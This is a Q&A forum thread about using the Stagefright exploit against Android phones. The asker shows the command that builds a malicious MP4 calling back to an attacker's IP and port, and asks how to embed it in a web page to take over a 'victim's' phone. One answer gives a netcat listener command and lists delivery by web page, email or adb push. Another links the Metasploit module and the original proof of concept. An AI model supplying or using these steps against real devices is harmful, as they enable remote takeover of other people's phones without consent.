2

I've been doing a lot of research on Stagefright lately and it has been confirmed that many phone models running Android Lollipop and below are susceptible to the exploit.

So since my S3 did indeed turn out to be vulnerable to the exploit, having used Zimperium's Stagefright Detector App, I decided to put it to the test.

I downloaded Joshua Drake's stagefright code (mp4.py) and managed to successfully craft the malicious MP4 file by running:

python mp4.py -c 192.168.x.x -p 4444

c for LAN IP

p for port number

Now a lot of tutorials online say that before sending the MP4 file via MMS to the target phone I must set up a backdoor using netcat. However, I have found that creating a backdoor using Metasploit is far more effective in gaining full control over the phone.

I've heard that you could also embed the MP4 or other multimedia files in a webpage such that when a victim visits the webpage you could gain full control over the phone in the same way as mentioned above.

So how could this be achieved?

Ahmed K.

2 Answers

1

You must install netcat on your PC, not on the device. Set this netcat in listening mode for the chosen port:

nc -lp 4444

The device will get its netcat by playing the forged video file. You don't need MMS to have the video sent to the phone. You can embed the video on a web page, send it by email, or simply use the adb push command to store it on the device. After that, use the standard video player to play the video, and you will have control over the device from your PC command line.

Alex Cohn
1

Try the Metasploit module: https://github.com/rapid7/metasploit-framework/pull/4742

Also, from Joshua Drake's original PoC: https://github.com/jduck/cve-2015-1538-1

First, it is not a generic exploit. It's only been tested to work on a single device model. My target was the Galaxy Nexus device running Android 4.0.4 containing only a partial implementation of ASLR.

To use it on another device, you must know the libc.so function addresses for ROP chain gadgets.

J.A.K.